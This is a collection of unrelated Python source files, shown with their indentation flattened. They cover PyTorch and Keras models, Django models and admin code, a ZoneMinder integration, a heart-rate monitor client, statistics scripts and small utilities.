self.mlp2 = nn.Linear(self.r, self.c)
'''
self.lstm.apply(self.weight_init)
self.attn1.apply(self.weight_init)
self.attn2.apply(self.weight_init)
self.mlp1.apply(self.weight_init)
self.mlp2.apply(self.weight_init)
'''
def weight_init(self, m):
if isinstance(m, nn.LSTM):
for _a in m.all_weights[0]:
if len(_a.size()) == 1:
continue
nn.init.xavier_uniform(_a)
if isinstance(m, nn.Linear):
m.weight.data = nn.init.xavier_uniform(m.weight.data)
def dist(self, tensor):
b = tensor.cpu().data.numpy()
mean = b.sum(0) / b.shape[0]
import numpy as np
c = np.array([np.linalg.norm(b[i] - mean) for i in range(b.shape[0])])
return np.std(c)
def forward(self, words, log=False):
words = words.squeeze()
words.data.t_()
embeds = self.embed(words)
batch = embeds.size(0)
slen = embeds.size(1)
if self.debug:
print('embeds', embeds.size())
#embeds = torch.transpose(embeds, 0, 1)
H, self.hidden = self.lstm(embeds)
if log:
print('H std:', self.dist(H))
if self.debug:
print('H', H.size())
print('u', self.u)
print('batch', self.batch)
print('slen', slen)
H = H.contiguous().view(batch * slen, self.u)
if self.debug:
print('H', H.size())
Attn1 = F.tanh(self.attn1(H))
if self.debug:
print('Attn1', Attn1.size())
Attn2 = self.attn2(Attn1)
if self.debug:
print('Attn2', Attn2.size())
A = F.softmax(Attn2)
A = A.view(batch, slen, self.r)
H = H.view(batch, slen, self.u)
A = torch.transpose(A, 1, 2)
if self.debug:
print('A', A.size())
print('H', H.size())
M = torch.bmm(A, H)
if self.debug:
print('M', M.size())
if log:
print('M std:', self.dist(M))
#print(M)
M = M.view(batch * self.r, -1)
mlp1 = F.relu(self.mlp1(M))
#mlp1 = self.mlp1(M)
mlp1 = mlp1.view(batch, -1)
if self.debug:
print('mlp1', mlp1.size())
#mlp2 = F.relu(self.mlp2(mlp1))
mlp2 = self.mlp2(mlp1)
if self.debug:
print('mlp2', mlp2.size())
if log:
print('mlp2 std:', self.dist(mlp2))
print(mlp2)
out = F.softmax(mlp2)
self.debug = False
return out
class SingleLSTM(Base):
def __init__(self, param):
super(SingleLSTM, self).__init__(param)
V = param['vocab_size']
D = param['embed_dim']
C = param['tagset_size']
self.hidden_dim = param['hidden_dim']
self.embed = nn.Embedding(V, D)
self.embed_dim = D
self.use_cuda = param['use_cuda']
self.device = param['device']
'''
if self.lower:
self.embed_dim += CAP_DIM
'''
self.lstm = nn.LSTM(D, param['hidden_dim'])
self.hidden2tag = nn.Linear(param['hidden_dim'], param['tagset_size'])
self.hidden = self.init_hidden()
self.loss_function = nn.NLLLoss()
def init_hidden(self):
# Before we've done anything, we dont have any hidden state.
# Refer to the Pytorch documentation to see exactly why they have this dimensionality.
# The axes semantics are (num_layers, minibatch_size, hidden_dim)
return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
def forward(self, words):
words = words.squeeze()
#print(type(words))
#print(len(words))
embeds = self.embed(words)
#print(embeds.size())
#print(embeds.view(len(words), 1, -1).size())
'''
if self.lower:
caps = input['caps']
input_caps = torch.FloatTensor(len(caps), CAP_DIM)
input_caps.zero_()
input_caps.scatter_(1, caps.view(-1,1) ,1)
input_caps = autograd.Variable(input_caps)
embeds = torch.cat((embeds, input_caps),1)
'''
lstm_out, self.hidden = self.lstm(embeds.view(len(words), 1, -1))
tag_space = self.hidden2tag(lstm_out.view(len(words), -1))
#return tag_space[-1].view(1,-1)
tag_scores = F.log_softmax(tag_space)
return tag_scores[-1].view(1, -1)
#tag_scores = nn.LogSoftmax(tag_space)
#return tag_scores[-1]
class SingleCNN(Base):
def __init__(self, param):
super(SingleCNN, self).__init__(param)
V = param['vocab_size']
Ks = [3, 4, 5]
D = param['embed_dim']
Co = 100
Ci = 1
self.use_cuda = param['use_cuda']
C = param['tagset_size']
print('V: %d, D: %d, C: %d, Co: %d, Ks, %s'%(V, D, C, Co, Ks))
self.device = param['device']
self.debug = True
if self.use_cuda:
self.embed = nn.Embedding(V, D).cuda(self.device)
self.convs1 = [nn.Conv2d(Ci, Co, (K, D)).cuda(self.device) for K in Ks]
else:
self.embed = nn.Embedding(V, D)
self.convs1 = [nn.Conv2d(Ci, Co, (K, D)) for K in Ks]
self.dropout = nn.Dropout(0.5)
self.fc1 = nn.Linear(len(Ks)*Co, C)
#self.loss_function = nn.NLLLoss()
def init_hidden(self):
return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
def forward(self, words):
words.data.t_()
if type(words) is torch.LongTensor:
words = Variable(words)
if self.debug:
print('words.size: ', words.size())
x = self.embed(words)
if self.debug:
print('embed.size: ', x.size())
x = x.unsqueeze(1) # (N,Ci,W,D)
if self.debug:
print('embed.size: ', x.size())
x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1] # [(N,Co,W), ...]*len(Ks)
if self.debug:
for _x in x:
print('relu.size: ', _x.size())
x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x] # [(N,Co), ...]*len(Ks)
if self.debug:
for _x in x:
print('pool.size: ', _x.size())
x = torch.cat(x, 1)
if self.debug:
print('cat.size: ', x.size())
x = self.dropout(x) # (N,len(Ks)*Co)
if self.debug:
print('dropout.size: ', x.size())
logit = self.fc1(x) # (N,C)
if self.debug:
print('fc1.size: ', logit.size())
self.debug = False
return logit
'''
def predict(self, **input):
#TODO: caps
words = input['words']
output = self.forward(words=words)
_, tag_id = torch.max(output, dim=0)
return tag_id
def get_loss(self, tags, **input):
words = input['words']
logit = self.forward(words=words)
loss = F.cross_entropy(logit, tags)
#loss = F.cross_entropy(self, tags)
return loss
'''
"""
class ShareLSTM(Base):
def __init__(self, param):
super(ShareLSTM, self).__init__(param)
V = param['vocab_size']
D = param['embed_dim']
C = param['tagset_size']
self.hidden_dim = param['hidden_dim']
self.embed = nn.Embedding(V, D)
self.embed_dim = D
'''
if self.lower:
self.embed_dim += CAP_DIM
'''
self.lstm = nn.LSTM(D, param['hidden_dim'])
# The linear layer that maps from hidden state space to tag space
self.w1 = nn.Linear(param['hidden_dim'], C)
self.w2 = nn.Linear(param['hidden_dim'], 2)
self.hidden = self.init_hidden()
self.loss_function = nn.NLLLoss()
def init_hidden(self):
return (autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)),
autograd.Variable(torch.Tensor(1, 1, self.hidden_dim)))
def forward(self, words):
embeds = self.embed(words)
if self.lower:
caps = input['input_caps']
input_caps = torch.FloatTensor(len(caps), CAP_DIM)
input_caps.zero_()
input_caps.scatter_(1, caps.view(-1, 1), 1)
input_caps = autograd.Variable(input_caps)
embeds = torch.cat((embeds, input_caps), 1)
lstm_out, self.hidden = self.lstm(embeds.view(len(words), 1, -1))
if input['data_set'] == 1:
tag_space = self.w1(lstm_out.view(len(words), -1))
else:
tag_space = self.w2(lstm_out.view(len(words), -1))
#tag_space = self.hidden2tag(lstm_out.view(1, -1))
tag_scores = F.log_softmax(tag_space)
#tag_scores = nn.LogSoftmax(tag_space)
return tag_scores[-1]
def get_tags(self, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
output = self.forward(words,
input_caps=input_caps,
data_set=input['data_set'])
else:
output = self.forward(words=words)
_, tag_id = torch.max(output, dim=0)
return tag_id
def get_loss(self, tags, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
tag_scores = self.forward(words=words, input_caps=input_caps, data_set=input['data_set'])
else:
tag_scores = self.forward(words=words)
loss = self.loss_function(tag_scores, tags)
return loss
def get_loss_2(self, data_set, tags, **input):
words = input['words']
if self.lower:
input_caps = input['input_caps']
tag_scores = self.forward(data_set, words=words, input_caps=input_caps)
else:
tag_scores = self.forward(data_set, words=words)
loss = self.loss_function(tag_scores, tags)
return loss
""" |
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
data=tf.keras.datasets.mnist
(x_train,y_train),(x_test,y_test)=data.load_data()
x_test=tf.keras.utils.normalize(x_test,axis=1)
x_train=tf.keras.utils.normalize(x_train,axis=1)
model=tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(128,activation=tf.nn.relu))
model.add(tf.keras.layers.Dense(128,activation=tf.nn.relu))
model.add(tf.keras.layers.Dense(10,activation=tf.nn.softmax))
model.compile(optimizer="adam",
loss="sparse_categorical_crossentropy",
metrics=['accuracy'])
model.fit(x_train,y_train,epochs=3)
# ---------------------------------------------------------------------------------
# # save a model
# model.save('epic.model')
# new_model=tf.keras.models.load_model('epic.model')
# _____________________________________________________________-__
# ------------------------------------------------------------------
val_loss,val_acc=model.evaluate(x_test,y_test)
print(val_loss,val_acc)
prediction=model.predict(x_test)
for i in range(5):
plt.grid(False)
plt.imshow(x_test[i],cmap=plt.cm.binary)
plt.xlabel("actual :" + str(y_test[i]))
plt.title("predicted : "+str(np.argmax(prediction[i])))
plt.show()
|
from blogging.models import Post, Category
from rest_framework import serializers
class PostSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Post
fields = ['title', 'text', 'author', 'created_date', 'modified_date', 'published_date', 'categories']
class CategorySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Category
fields = ['name', 'description'] |
'''
Created on 11-Feb-2019
@author: prasannakumar
'''
class work1:
def cutting(self):
print("the worker can cut the trees")
def jump(self):
print("the man can jump")
print("pk") |
import threading
from time import sleep
from HRMListener import *
from usb import USBError
import requests
import config
import json
class HRMThread(threading.Thread):
# #inerval is the period the thread get HR from device
def __init__(self, monitorScreen, statusMessage, interval=10, userID=None):
threading.Thread.__init__(self)
self.listener = HRMListener(netkey=NETKEY, serial=SERIAL)
self.monitorScreen = monitorScreen
self.interval = interval
self.alive = False
self.exception = None
self.statusMessage = statusMessage
self.userID = userID
self.failure_count = 0
def run(self):
try:
self.listener.start()
self.alive = True
self.showMessage("Hardware Connected.")
except USBError as e:
self.showMessage("USBError: " + e.message)
self.alive = False
except exceptions.DriverError as e:
self.showMessage("DriverError: " + e.message)
self.alive = False
while self.alive:
if self.userID is not None and self.listener.getHR() != '0':
self.postHRToServer(self.listener.getHR())
self.updateScreen()
sleep(self.interval)
def postHRToServer(self, heartRate):
try:
destUrl = config.url + '/active_user/' + str(self.userID) + '/heart_rate'
body = {'id': self.userID, 'heart_rate': str(heartRate)}
r = requests.post(url=destUrl, json=body)
msg = json.loads(str(r.text))
print 'HRM Message', msg['message']
if msg['message'] is 'User not activated':
self.showMessage('Not activated, please activate through website.')
self.failure_count += 1
if msg['message'] != 'recorded' or 'User not activated':
print 'post hr: ', heartRate
self.failure_count += 1
elif msg['message'] == 'timeReached':
self.showMessage('Session time Finished.')
else:
self.showMessage(msg['message'])
except (requests.HTTPError, requests.ConnectionError, requests.RequestException) as e:
print "hrmThread error", e.message
self.failure_count += 1
pass
# self.checkErrorTime()
def finish(self):
try:
self.listener.stop()
except exceptions.NodeError as e:
self.showMessage("NodeError: " + e.message)
finally:
self.monitorScreen.config(text="0")
self.alive = False
def showMessage(self, msg):
self.statusMessage.config(text="Status: " + msg)
def updateScreen(self):
self.monitorScreen.config(text=self.listener.getHR())
def isAlive(self):
return self.alive
def getException(self):
return self.exception
# def checkErrorTime(self):
#
# print "error time", self.failure_count
# if self.failure_count > 10:
#
# self.showMessage("connection error, disconnected.")
# self.failure_count = 0
# self.finish()
|
from pre_exam_concert_data import student_data, with_accompaniment_costs, no_accompaniment_costs
# Variables
final_cost = 0
audience_ticket = 10
print("Pre-Exam Concerts\n")
for i in range(2):
new_dictionary = {}
performer_name = input("Name of performer: ")
new_dictionary['Performer name'] = performer_name
performer_instrument = input("What instrument are you going to play?: ")
new_dictionary['Instrument'] = performer_instrument
student_data.append(new_dictionary)
# performer_grade = int(input("Current grade (level): "))
# audience_count = int(input("How many audience members?: "))
# requires_accompaniment = input("Does performer need accompaniment? Type 'y' for yes or 'n' for no: ") # boolean
print(student_data)
|
from django.contrib import admin
from .models import Link, SideBar
from blog_sys.custom_site import custom_site
from blog_sys.base_admin import BaseOwnerAdmin
# Register your models here.
@admin.register(Link, site=custom_site)
class LinkAdmin(BaseOwnerAdmin):
list_display = ('title', 'href', 'weight', 'status', 'owner', 'creat_time')
list_display_links = ['href']
fields = ('title', 'href', 'weight', 'status')
# Register your models here.
@admin.register(SideBar, site=custom_site)
class SideBarAdmin(BaseOwnerAdmin):
list_display = ('title', 'display_type', 'content', 'status', 'owner', 'creat_time')
fields = ('title', 'display_type', 'content', 'status')
|
"""
@author: Gaetan Hadjeres
"""
from BFT.handlers import EncoderDecoderHandler
from BFT.positional_embeddings import PositionalEmbedding
import importlib
import os
import shutil
from datetime import datetime
import click
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel
from BFT.getters import get_dataloader_generator, get_sos_embedding, get_source_target_data_processor, get_encoder_decoder, get_positional_embedding
@click.command()
@click.option('-t', '--train', is_flag=True)
@click.option('-l', '--load', is_flag=True)
@click.option('-o', '--overfitted', is_flag=True)
@click.option('-c', '--config', type=click.Path(exists=True))
@click.option('-n', '--num_workers', type=int, default=0)
def launcher(train, load, overfitted, config, num_workers):
# === Set shared parameters
# always use the maximum number of available GPUs for training
if train:
world_size = torch.cuda.device_count()
assert world_size > 0
else:
# only use 1 GPU for inference
world_size = 1
# Load config as dict
config_path = config
config_module_name = os.path.splitext(config)[0].replace('/', '.')
config = importlib.import_module(config_module_name).config
# Compute time stamp
if config['timestamp'] is not None:
timestamp = config['timestamp']
else:
timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
config['timestamp'] = timestamp
# Create or retreive model_dir
if load:
model_dir = os.path.dirname(config_path)
else:
model_dir = f'models/{config["savename"]}_{timestamp}'
# Copy .py config file in the save directory before training
if not load:
if not os.path.exists(model_dir):
os.makedirs(model_dir)
shutil.copy(config_path, f'{model_dir}/config.py')
print(f'Using {world_size} GPUs')
mp.spawn(main,
args=(train, load, overfitted, config, num_workers, world_size,
model_dir),
nprocs=world_size,
join=True)
def main(rank, train, load, overfitted, config, num_workers, world_size,
model_dir):
# === Init process group
os.environ['MASTER_ADDR'] = 'localhost'
# os.environ['MASTER_PORT'] = '12355'
# os.environ['MASTER_PORT'] = '12356'
# os.environ['MASTER_PORT'] = '12357'
os.environ['MASTER_PORT'] = '12358'
# os.environ['MASTER_PORT'] = '12359'
dist.init_process_group(backend='nccl', world_size=world_size, rank=rank)
torch.cuda.set_device(rank)
device = f'cuda:{rank}'
# === Decoder ====
# dataloader generator
dataloader_generator = get_dataloader_generator(
dataset=config['dataset'],
dataloader_generator_kwargs=config['dataloader_generator_kwargs'])
# data processor
data_processor = get_source_target_data_processor(
dataloader_generator=dataloader_generator,
data_processor_type=config['data_processor_type'],
data_processor_kwargs=config['data_processor_kwargs'])
# positional embedding
positional_embedding_source: PositionalEmbedding = get_positional_embedding(
dataloader_generator=dataloader_generator,
positional_embedding_dict=config['positional_embedding_source_dict'])
positional_embedding_target: PositionalEmbedding = get_positional_embedding(
dataloader_generator=dataloader_generator,
positional_embedding_dict=config['positional_embedding_target_dict'])
# sos embedding
sos_embedding = get_sos_embedding(
dataloader_generator=dataloader_generator,
sos_embedding_dict=config['sos_embedding_dict'])
encoder_decoder = get_encoder_decoder(
data_processor=data_processor,
dataloader_generator=dataloader_generator,
positional_embedding_source=positional_embedding_source,
positional_embedding_target=positional_embedding_target,
sos_embedding=sos_embedding,
encoder_decoder_type=config['encoder_decoder_type'],
encoder_decoder_kwargs=config['encoder_decoder_kwargs'],
training_phase=train)
encoder_decoder.to(device)
encoder_decoder = DistributedDataParallel(
module=encoder_decoder,
device_ids=[rank],
output_device=rank,
# find_unused_parameters=True
)
handler = EncoderDecoderHandler(model=encoder_decoder,
model_dir=model_dir,
dataloader_generator=dataloader_generator)
if load:
if overfitted:
handler.load(early_stopped=False,
recurrent=not train
)
else:
handler.load(early_stopped=True,
recurrent=not train)
if train:
handler.train_model(
batch_size=config['batch_size'],
num_batches=config['num_batches'],
num_epochs=config['num_epochs'],
lr=config['lr'],
plot=True,
num_workers=num_workers,
)
exit()
(generator_train, generator_val,
_) = dataloader_generator.dataloaders(batch_size=1,
num_workers=num_workers,
shuffle_val=True)
x = next(generator_val)['x']
_, x, _ = data_processor.preprocess(x)
x = x.repeat(1, 1, 1)
masked_positions = torch.zeros_like(x)
# inpainting # But no longer needed!
masked_positions[:, 100:150] = 1
# masked_positions[1:, 600:700] = 1
# masked_positions[1:, 1000:]
# unconstrained:
# masked_positions[1:, :] = 1
# removes only notes
# masked_positions[1:, :, 0:3] = 1
# Velocifier
# masked_positions[1:, :, 1:3] = 1
# TEST
metadata_dict = dict(original_sequence=x,
masked_positions=masked_positions)
handler.test_decoder_with_states(
source=x,
metadata_dict=metadata_dict,
temperature=1.,
top_p=0.95
)
# scores = handler.inpaint(x=x,
# masked_positions=masked_positions,
# temperature=1.,
# top_p=0.95,
# top_k=0)
# midi_file = 'inputs/br_rhap_format0.mid')
# midi_file='/home/gaetan/Data/databases/Piano/ecomp_piano_dataset/BENABD02.mid')
# midi_file='/home/gaetan/Data/databases/Piano/ecomp_piano_dataset/Denisova04.MID')
# scores = decoder.generate_reharmonisation(
# temperature=1.0,
# num_reharmonisations=3,
# top_k=0,
# top_p=0.8
# )
# for score in scores:
# score.show()
# # Body code: need do check cluster before adding values
# start_cluster = 7
# end_cluster = 21
# pad_cluster = 12
#
# start_codes = [pad_cluster] * 5 + [start_cluster]
# end_codes = [end_cluster] + [pad_cluster] * 5
# body_codes = [1] * 16 # put what u want here
# scores = decoder.generate_alla_mano(
# start_codes=start_codes,
# end_codes=end_codes,
# body_codes=body_codes,
# temperature=1.2,
# )
# for score in scores:
# score.show()
if __name__ == '__main__':
launcher()
|
from .sign_up import SignUpForm
|
# flake8: noqa
from . import model
|
import matplotlib.pyplot as plt
import numpy as np
import torch
def plot_graph(data, labels, legends, title):
"""
Plot multiple graphs in same plot
:param data: data of the graphs to be plotted
:param labels: x- and y-label
:param legends: legends for the graphs
:param title: Title of the graph
"""
x = np.arange(1, len(data[0]) + 1)
for to_plot in data:
plt.plot(x, to_plot)
plt.title(title)
plt.xlabel(labels[0])
plt.ylabel(labels[1])
plt.legend(legends)
plt.show()
plt.savefig('{}.png'.format(title))
def plot_training_data(data):
"""
Plot training data, loss over epochs.
"""
training_data = np.array(data).T
plot_graph(training_data, ["Epoch", "Cross-entropy-loss"], ["Training loss", "Validation loss"],
"Loss over epochs")
def get_device():
if torch.cuda.is_available():
return torch.device("cuda")
else:
return torch.device("cpu")
|
"""
Support for Zoneminder.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/zoneminder/
"""
import logging
import json
from urllib.parse import urljoin
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
CONF_PATH, CONF_HOST, CONF_SSL, CONF_PASSWORD, CONF_USERNAME)
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = []
DOMAIN = 'zoneminder'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_PATH, default="/zm/"): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string
})
}, extra=vol.ALLOW_EXTRA)
LOGIN_RETRIES = 2
ZM = {}
def setup(hass, config):
"""Setup the zonminder platform."""
global ZM
ZM = {}
conf = config[DOMAIN]
if conf[CONF_SSL]:
schema = "https"
else:
schema = "http"
url = urljoin(schema + "://" + conf[CONF_HOST], conf[CONF_PATH])
username = conf.get(CONF_USERNAME, None)
password = conf.get(CONF_PASSWORD, None)
ZM['url'] = url
ZM['username'] = username
ZM['password'] = password
return login()
# pylint: disable=no-member
def login():
"""Login to the zoneminder api."""
_LOGGER.debug("Attempting to login to zoneminder")
login_post = {'view': 'console', 'action': 'login'}
if ZM['username']:
login_post['username'] = ZM['username']
if ZM['password']:
login_post['password'] = ZM['password']
req = requests.post(ZM['url'] + '/index.php', data=login_post)
ZM['cookies'] = req.cookies
# Login calls returns a 200 repsonse on both failure and success..
# The only way to tell if you logged in correctly is to issue an api call.
req = requests.get(
ZM['url'] + 'api/host/getVersion.json',
cookies=ZM['cookies']
)
if req.status_code != requests.codes.ok:
_LOGGER.error("Connection error logging into ZoneMinder")
return False
return True
# pylint: disable=no-member
def get_state(api_url):
"""Get a state from the zoneminder API service."""
# Since the API uses sessions that expire, sometimes we need
# to re-auth if the call fails.
for _ in range(LOGIN_RETRIES):
req = requests.get(urljoin(ZM['url'], api_url), cookies=ZM['cookies'])
if req.status_code != requests.codes.ok:
login()
else:
break
else:
_LOGGER.exception("Unable to get API response")
return json.loads(req.text)
# pylint: disable=no-member
def change_state(api_url, post_data):
"""Update a state using the Zoneminder API."""
for _ in range(LOGIN_RETRIES):
req = requests.post(
urljoin(ZM['url'], api_url),
data=post_data,
cookies=ZM['cookies'])
if req.status_code != requests.codes.ok:
login()
else:
break
else:
_LOGGER.exception("Unable to get API response")
return json.loads(req.text)
|
a=int(input())
b=''
for i in range(2,a,2):
if a%i==0:
b+=str(i)+" "
print(b+str(a))
|
from to_send_a_fax import E, f
import unittest
class ToSendAFaxTest(unittest.TestCase):
def test_E(self):
self.assertEqual(4, E(0)) # zero
self.assertEqual(3, E(1)) # one
self.assertEqual(3, E(2)) # two
self.assertEqual(5, E(3)) # three
self.assertEqual(4, E(4)) # four
self.assertEqual(4, E(5)) # five
self.assertEqual(3, E(6)) # six
self.assertEqual(5, E(7)) # seven
self.assertEqual(5, E(8)) # eight
self.assertEqual(4, E(9)) # nine
self.assertEqual(3, E(10)) # ten
self.assertEqual(6, E(11)) # eleven
self.assertEqual(6, E(12)) # twelve
self.assertEqual(8, E(13)) # thirteen
self.assertEqual(8, E(14)) # fourteen
self.assertEqual(7, E(15)) # fifteen
self.assertEqual(7, E(16)) # sixteen
self.assertEqual(9, E(17)) # seventeen
self.assertEqual(8, E(18)) # eighteen
self.assertEqual(8, E(19)) # nineteen
self.assertEqual(6, E(20)) # twenty
self.assertEqual(9, E(21)) # twentyone
self.assertEqual(6, E(30)) # thirty
self.assertEqual(5, E(40)) # forty
self.assertEqual(5, E(50)) # fifty
self.assertEqual(5, E(60)) # sixty
self.assertEqual(7, E(70)) # seventy
self.assertEqual(6, E(80)) # eighty
self.assertEqual(6, E(90)) # ninety
self.assertEqual(10, E(99)) # ninetynine
self.assertEqual(10, E(100)) # one hundred
self.assertEqual(13, E(101)) # one hundred one
self.assertEqual(21, E(123)) # one hundred twenty three
self.assertEqual(21, E(999)) # nine hundred ninety nine
# one hundred twenty three thousand four hundred fifty six
self.assertEqual(48, E(123456))
# nine hundred ninety nine thousand nine hundred ninety nine
self.assertEqual(50, E(999999))
# minus one hundred twenty three thousand four hundred fifty six
self.assertEqual(53, E(-123456))
def test_f(self):
# f(x) = 3[E(x)]^3-x
# f(0) = 3[E(0)]^3
# = 3[4]^3
# = 192
self.assertEqual(192, f(0))
# f(-123) = 3[E(-123)]^3 + 123
# = 3[26]^3 + 123
# = 52851
self.assertEqual(52851, f(-123))
if __name__ == '__main__':
unittest.main()
|
from django.contrib import admin
from .models import Aluno, Professor
admin.site.register(Aluno)
admin.site.register(Professor) |
from django import forms
from .models import question,answer
class question_form (forms.ModelForm):
class Meta :
model = question
fields = ('question',)
class answer_form (forms.ModelForm):
class Meta :
model = answer
fields = ('the_answer',)
|
import pandas as pd
import matplotlib.pyplot as plt
TWOTAILED = 'TTT'
ONETAILED = 'OTT'
ALPHA05 = 0.05
ALPHA01 = 0.05
selalpha = ALPHA05
#selalpha = float(raw_input())
dfw = pd.read_csv("./WSRTdf.csv")
df = pd.read_csv("./SystolicBloodPressureAnalysis.csv")
number_of_samples = len(df)
df['Difference'] = df.SBP_before - df.SBP_after
df['AbsDiff'] = abs(df.Difference)
df = df.sort_values(['AbsDiff', 'Difference'])
df['Ranks'] = df['AbsDiff'].rank()
df['R+'] = df['Ranks']*(df['Difference'] > 0)
df['R-'] = df['Ranks']*(df['Difference'] < 0)
boxplot = df.boxplot(by='AbsDiff', column=['SBP_before','SBP_after'])
plt.show()
Wplus = sum(df['R+'])
Wminus = sum(df['R-'])
W = min(Wplus, Wminus)
#selecting the matching value in the table
threshold = dfw[(dfw['type'] == TWOTAILED) & (dfw['alpha'] == selalpha) & (dfw['n'] == number_of_samples)]['value'].iloc[0]
if W > threshold:
print("Accepted")
else:
print("Rejected")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 2 21:55:47 2019
@author: robertwinslow
I want to have a big list of substances tagged with properties for a little doodle.
The substances are stored in an outside textfile with the following format.
[tags] Name
Tags are:
H=hot, h=cold
D=dry, d=wet
A=active, a=passive
B=bright, b=dark
L=lightweight, l=dense
U=unyielding, u=yielding (hard vs soft)
Examples:
HDABLu Fire
hdaLU Ice
This code is meant for messing with the sets using the interpreter.
"""
import itertools
#%% set up data structures and definitions
pdic = {} #properties dictionary. maps flags/properties to sets of substances
flags = "HhDdAaBbLlUu" #same order as names below
fullPropNames = ['hot', 'cold', 'dry', 'wet', 'active', 'passive',
'bright', 'dark', 'lightweight', 'dense', 'unyielding', 'yielding']
sdic = {} #substances dictionary. Reverse of pdic. maps substance to set of flags
for i in range(len(flags)):
#make two entries in the pdic for each property, pointing to the same set
pdic[flags[i]] = set()
pdic[fullPropNames[i]] = pdic[flags[i]]
#now also map each variable name to the string, for faster typing in terminal
#this is not best coding practices, but eh.
exec(flags[i] + "='" + flags[i] + "'" )
exec(fullPropNames[i] + "='" + flags[i] + "'" )
#manual synonyms:
hard = unyielding
soft = yielding
subtle = lightweight
Ø = frozenset() #just for fun.
#%% Load the current list into memory
sourcefile = open("substances.txt")
txt = sourcefile.read().split('\n')
for item in txt:
properties, name = item.split(maxsplit=1)
sdic[name] = set()
#put the name into the substance dictionary and vice versa
for prop in properties:
pdic[prop].add(name)
sdic[name].add(prop)
sourcefile.close()
#%% Functions for manipulating and adding to the sets
def add_thing(name, *properties):
"Example usage: add_thing('Potato', H, soft)"
if name not in sdic: sdic[name] = set()
for prop in properties:
pdic[prop].add(name)
sdic[name].add(prop)
def remove_thing(name):
"purges this substance from the data"
if name in sdic:
properties = sdic[name]
del sdic[name]
for prop in properties:
pdic[prop].remove(name)
def find_match(*properties, quiet=False):
"prints a list of the items in the intersection of the sets"
sets = [pdic[prop] for prop in properties]
intersection = set.intersection(*sets)
#if not quiet: print(intersection)
return intersection
def find_empty_triplets():
"iterates through all valid triplets and says which ones are missing substances"
pairs = [fullPropNames[2*i:2*i+2] for i in range(6)]
for combo in itertools.combinations(pairs,3):
for triplet in itertools.product(*combo):
if len(find_match(*triplet, quiet=True))<3:
print(triplet, find_match(*triplet))
find_empty_triplets()
#%% function to save file. If you don't call this, the dictionaries won't be saved.
def save_substances(filename="substances.txt"):
file = open(filename,'w')
lines = []
for name in sdic:
properties = "".join(sdic[name])
lines.append(properties + " " + name)
file.write("\n".join(lines))
file.close()
|
import argparse
import shutil
import numpy as np
from os import makedirs
from os.path import join, exists
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', default='data/elmo',
help='Directory containing the dataset')
parser.add_argument('--output_dir', default='data/averaged_elmo',
help='Output directory')
parser.add_argument('--original_data_dir', default='data/balanced',
help='Directory of the original data (before conversion to ELMo suitable foramt')
def convert_dataset(data_dir, output_dir, original_data_dir):
for split in ['train', 'val', 'test']:
if not exists(join(output_dir, split)):
makedirs(join(output_dir, split))
with open(join(data_dir, split, 'sentences.txt'), 'r', encoding='utf-8') as f,\
open(join(output_dir, split, 'sentences.txt'), 'w', encoding='utf-8') as e:
for line in f:
if line not in ['\n']:
line = line.split()
token = line[0]
embedding_layers = line[1:]
averaged_layers = compute_layer_average(embedding_layers)
e.write(token + ' ' + ' '.join(map(str, averaged_layers)) + '\n')
else:
e.write('\n')
shutil.copyfile(join(original_data_dir, split, 'noun_verb_labels.txt'),
join(output_dir, split, 'noun_verb_labels.txt'))
shutil.copyfile(join(original_data_dir, split, 'dataset_params.json'),
join(output_dir, split, 'dataset_params.json'))
shutil.copyfile(join(original_data_dir, split, 'labels_vocab.txt'),
join(output_dir, split, 'labels_vocab.txt'))
def compute_layer_average(elmo_layers):
elmo_layers = np.asarray(elmo_layers, dtype='float32')
averaged_layers = np.mean(elmo_layers.reshape(3,-1), axis=0)
return averaged_layers
if __name__ == '__main__':
args = parser.parse_args()
path_dataset = args.data_dir
output_dir = args.output_dir
original_data_dir = args.original_data_dir
convert_dataset(path_dataset, output_dir, original_data_dir) |
class Employee:
""" simple model to blueprint an employee"""
def __init__(self,fname,lname,salary):
""" set employee name and salary"""
self.first_name = fname
self.last_name = lname
self.salary = salary
def give_raise(self,amount=5000):
""" give $5000 raise as default or raise as per inout """
self.salary += amount |
#!/usr/bin/env python3
import argparse
import itertools
import os
import posixpath
import re
try:
import cPickle as pickle # Python 2
except ImportError:
import pickle # Python 3
import ninja
def _parse_args():
parser = argparse.ArgumentParser()
# Ninja input file options
parser.add_argument('input_file', help='input ninja file')
parser.add_argument('--ninja-deps', help='.ninja_deps file')
parser.add_argument('--cwd', help='working directory for ninja')
parser.add_argument('--encoding', default='utf-8',
help='ninja file encoding')
# Options
parser.add_argument(
'--out-dir', default='out', help='path to output directory')
parser.add_argument(
'--installed-filter', default='system',
help='path filter for installed files (w.r.t. device root)')
parser.add_argument(
'--source-filter', default='vendor:device',
help='path filter for source files (w.r.t. source root)')
return parser.parse_args()
def main():
args = _parse_args()
out_dir = posixpath.normpath(args.out_dir)
out_pattern = re.compile(re.escape(out_dir) + '/')
installed_dirs = '|'.join('(?:' + re.escape(posixpath.normpath(path)) + ')'
for path in args.installed_filter.split(':'))
